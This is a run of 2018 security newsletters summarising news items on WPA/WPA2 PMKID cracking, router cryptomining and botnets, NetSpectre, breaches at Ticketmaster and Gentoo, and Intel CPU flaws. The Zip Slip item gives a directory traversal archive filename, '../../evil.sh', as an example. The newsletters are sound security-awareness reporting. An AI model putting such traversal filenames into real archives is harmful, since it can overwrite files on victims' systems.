BF-SIRT Newsletter 2018-32

A new method has been found to make cracking WPA/WPA2 easier

The makers of Hashcat found a simpler way to gather the Pairwise Master Key Identifier (PMKID) from WPA/WPA2-secured wifi network. Before this method was discovered an attacker would have to wait for a user to authenticate, and then steal the 4-way handshake of the user. This new method is a “client-less attack”, meaning it can gather all the information needed without anyone using the network. This can significantly speed up the process of obtaining the PMKID.

The good news is that the passwords still needs to be cracked by brute force or dictionary attack, so if you are using a secure password this is still a non-trivial process. It also only works on Pre-Shared Key (PSK), meaning using other authentication methods should be safe.

Top 5 Security links

 

BF-SIRT Newsletter 2018-31

Huge Cryptomining Attack on ISP-Grade Routers Spreads Globally

Carrier-grade MikroTik routers are delivering potentially millions of daily cryptomining pages to the attacker.

A massive hacking campaign has been uncovered, compromising tens of thousands of MikroTik routers to embed Coinhive scripts in websites using a known vulnerability.

So far, Censys.io has reported more than 170,000 active MikroTik devices infected with the CoinHive site-key used in this campaign (the site-key is the same across infections, indicating a single entity behind the attacks). The campaign is mainly targeting Brazil – but infections are growing internationally, according to Trustwave’s Secure Web Gateway (SWG) team, indicating much larger ambitions.

“This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” Trustwave researcher Simon Kenin wrote a posting today. “This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

 

Top 5 Security Links

How to defend yourself against SamSam ransomware

Backdoors keep appearing in Cisco’s routers

Reddit breach highlights limits of sms-based authentication

Attacks on industrial enterprises using RMS and Teamviewer

Amnesty International targeted by Nation-state spyware

A telecommunication test set connected to a network switch, to perform some data transmission quality measurements.

BF-SIRT Newsletter 2018-30

New Spectre attack enables secrets to be leaked over a network

In a paper named “NetSpectre: Read Arbitrary Memory over Network” researchers from Graz University of Technology, including one of the original Meltdown discoverers, Daniel Gruss, have described NetSpectre: a fully remote attack based on Spectre. With NetSpectre, an attacker can remotely read the memory of a victim system without running any code on that system.

The major catch  is that this side-channel attack only leaks 15 bits per hour, or 60 bits an hour via an AVX-based covert channel, which means it could take days to find and gather privileged information such as an encryption key or authentication token.

Intel has issued a statement saying: “NetSpectre is an application of Bounds Check Bypass (CVE-2017-5753), and is mitigated in the same manner – through code inspection and modification of software to ensure a speculation stopping barrier is in place where appropriate. We provide guidance for developers in our whitepaper, Analyzing Potential Bounds Check Bypass Vulnerabilities, which has been updated to incorporate this method. We are thankful to Michael Schwarz, Daniel Gruss, Martin Schwarzl, Moritz Lipp, & Stefan Mangard of Graz University of Technology for reporting their research.”

Top 5 Security Links

LifeLock Bug Exposed Millions of Customer Email Addresses

Google hasn’t suffered an employee phishing compromise in over a year

DHS – Russian APT groups are inside US critical infrastructure

Attacks on Oracle WebLogic Servers Detected After Publication of PoC Code

Adopting a Zero Trust approach is the best strategy to control access

 

 

 
(Blogpost image by Ildefonso Polo under “Do whatever you want”-license by Unsplash)

BF-SIRT Newsletter 2018-28

Botnet built with one exploit only

A malware author has built a huge botnet comprised of over 18,000 routers in the span of only one day.

This new botnet has been spotted this week by security researchers from NewSky Security, and their findings have been confirmed by Qihoo 360 Netlab, Rapid7, and Greynoise.

The botnet has been built by exploiting a vulnerability in Huawei HG532 routers, tracked as CVE-2017-17215.

Botnet author is a known threat actor

The botnet herder identified himself with the pseudonym “Anarchy.” Answering inquiries from both Anubhav and Bleeping Computer, Anarchy did not provide a reason why he created the botnet.

But Anubhav believes Anarchy may actually be a hacker who previously identified as Wicked, which Anubhav interviewed on NewSky’s blog and Fortinet featured in a report here.

But the real problem here is not a malware author doing what he does best. The problem is the relative ease with which Anarchy built a gigantic botnet within one day.

He didn’t do it with a zero-day or some vulnerability that had not been exploited before. He did so with a high-profile vulnerability that many botnets have exploited before.

Top 5 Security links

Public By Default: What Venmo (and the Whole World) Knows About You

Microsoft Identity Bounty Program Pays $500 to $100,000 for Bugs

Sextortion scam knows your password, but don’t fall for it

Director of National Intelligence warns of devastating cyber threat to US infrastructure

Google User Content CDN Used for Malware Hosting

BF-SIRT Newsletter 2018-27

Chrome Now Features Site Isolation to Defend Against Spectre

A new feature called site isolation is being tapped to protect Chrome users against Spectre.

Google introduced new security mitigations for its Chrome browser to defend against recently discovered Spectre variants.

The new security feature, called site isolation, essentially isolates different browser work processes between various browser tabs. That means one tab’s webpage rendering and functions won’t interfere with what is happening in another. It has now been pushed out to most users of Chrome 67, released in May, for platforms Windows, Mac, Linux and ChromeOS, said Google.

“Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers,” said Google software engineer Charlie Reis in a Wednesday post. “A website could use such attacks to steal data or login information from other websites that are open in the browser.”

Site Isolation is nothing new. It’s been optionally available as an experimental enterprise policy since Chrome 63 for customers. But, said Reis, many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

On Tuesday, more Spectre variants were disclosed –  dubbed Spectre1.1 and a subset, Spectre1.2, collectively referred to as Variant 4 of Spectre by Intel and ARM.

Top 5 Security links

Default router password leads to spilled military secrets
The next generation of WI-FI security will save you from yourself
Update Flash (and Adobe Acrobat) NOW!
Thermanator attack steals passwords by reading thermal residue on keyboardss
Stolen D-Link certificate used to digitally sign spying malware

Photo by Charles Deluvio 🇵🇭🇨🇦 on Unsplash

BF-SIRT Newsletter 2018-26

Gentoo shows off prompt and professional security response after minor breach

A weak administrator password allowed an unknown attacker to gain access to the Gentoo Linux distribution’s GitHub account and lock developers out of it. The GitHub repositories of Gentoo are only downstream mirrors from the self-hosted Gentoo.org infrastructure.

From an organizational standpoint, Gentoo’s handling of the incident was prompt and professional. Gentoo released official statements promptly detailing the nature of breach. This should be considered the standard against which organizations are judged for handling security breaches.

Top 5 Security links

Programmer tried to sell cyberweapon on dark web for $50M: Reminder to secure employees
Gartner Identifies the Top Six Security and Risk Management Trends
UK Banks Told To Show Their Backup Plans For Tech Shutdowns
Google tries to calm controversy over app developers having access to your Gmail
Why LTE and 5G networks could be affected by these new security vulnerabilities

 

(Blogpost image by Charles Deluvio 🇵🇭🇨🇦, “Front-End Development“, “Do whatever you want”-license by Unsplash)

BF-SIRT Newsletter 2018-25

Ticketmaster chat feature leads to Credit-Card Breach

Tens of thousands of people have been caught up in a data breach at Ticketmaster UK, which exposed credit-card and personal information for UK and some international customers.

The ticket-selling giant said that on Saturday it found malware within a customer chat function for its websites, hosted by Inbenta Technologies. Worryingly, the malicious code was found to be accessing an array of information, including name, address, email address, telephone number, payment details and Ticketmaster login details.

The malware managed to stay under the radar for months as well, Ticketmaster said. The breach affects those who purchased, or attempted to purchase, event tickets between September 2017 and June 23 of this year. About 5 percent of its customer base is affected, the company noted, which according to the BBC’s calculations works out to 40,000 or so victims.

Ticketmaster has since disabled the feature, which was running on Ticketmaster International, Ticketmaster UK, GETMEIN! and TicketWeb websites. It also said in a website notice that “forensic teams and security experts are working around the clock to understand how the data was compromised,” and said that it has notified the affected customers.

Top 5 Security links

Top 10 most abused top level domains
Google to Fix Location data leak in Google Home, Chromecast
Marketing firm Exactis leaked a personal info database with 340 million records
Botnets evolving to mobile devices
ANNOUNCING : STARTTLS everywhere: Securing hop-to-hop email delivery

BF-SIRT Newsletter 2018-24

Launching VirusTotal Monitor, a service to mitigate false positives

A new service from VirusTotal enables software developers to privately check and monitor application code against antivirus engines, in a bid to reduce false positives.
 
VirusTotal announced a new Monitor service on June 19 that could help to reduce malware false positives in software.
Since the site was founded in 2004, VirusTotal has enabled developers and antivirus vendors to check files against malware detection engines. With the new VirusTotal (VT) Monitor, software developers can now benefit from a private system where they can upload new files and have them continuously checked to see if they will be flagged as malware. The VirusTotal Monitor service is an attempt to help software developers limit false positive malware detection.

 

Top 5 Security links

“Huge” Browser Bug Enabled Malicious Websites to Retrieve Data from Other Sites You Visited
New North Korea Cyberattack Launches
Sneaky Web Tracking Technique Under Heavy Scrutiny by GDPR
New phishing scam reels in Netflix users to TLS_certified sites
Android Gets New Anti-Spoofing Feature to Make Biometric Authentication Secure

BF-SIRT Newsletter 2018-23

New Vulnerability Found in All Modern Intel CPUs

Another security vulnerability has been discovered in Intel chips that affects the processor’s speculative execution technology. Dubbed Lazy FP State Restore, the vulnerability (CVE-2018-3665) within Intel Core and Xeon processors has just been confirmed by Intel, and vendors are now rushing to roll out security updates in order to fix the flaw.

Unlike other chip vulnerabilities, this one does not reside in the hardware layer, so this can be fixed by new microcode from Intel. As always, keep your software up to date.

Top 5 Security links
Startup Working on Contentious Pentagon AI Project Was Hacked
Tens of Thousands of Android Devices Are Exposing Their Debug Port
Citation needed: Europe claims Kaspersky wares ‘confirmed as malicious’
Feds Bust Dozens of Email Scammers, but Your Inbox Still Isn’t Safe
What got breached this week? Ticket portals, DNA sites, and Atlanta’s police cameras

 

(Blogpost image by Alexandru-Bogdan Ghita, “CPU in Socket”, “Do whatever you want”-license by Unsplash)

BF-SIRT Newsletter 2018-22

Public Disclosure of a Critical Arbitrary File Overwrite Vulnerability: Zip Slip

The Snyk Security team is today announcing the public disclosure of a critical arbitrary file overwrite vulnerability called Zip Slip. It is a widespread vulnerability which typically results in remote command execution. The vulnerability affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many others. It has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java. Of course, this type of vulnerability has existed before, but recently it has manifested itself in a much larger number of projects and libraries.

Zip Slip is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). The vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z.

Top 5 Security links

Another flash update
Shipping industry cybersecurity: A shipwreck waiting to happen
Widespread Google groups misconfiguration exposes sensitive information
Destructive and MiTM capabilities of VPNFilter Malware revealed
When cybercriminals are rubbish at cybersecurity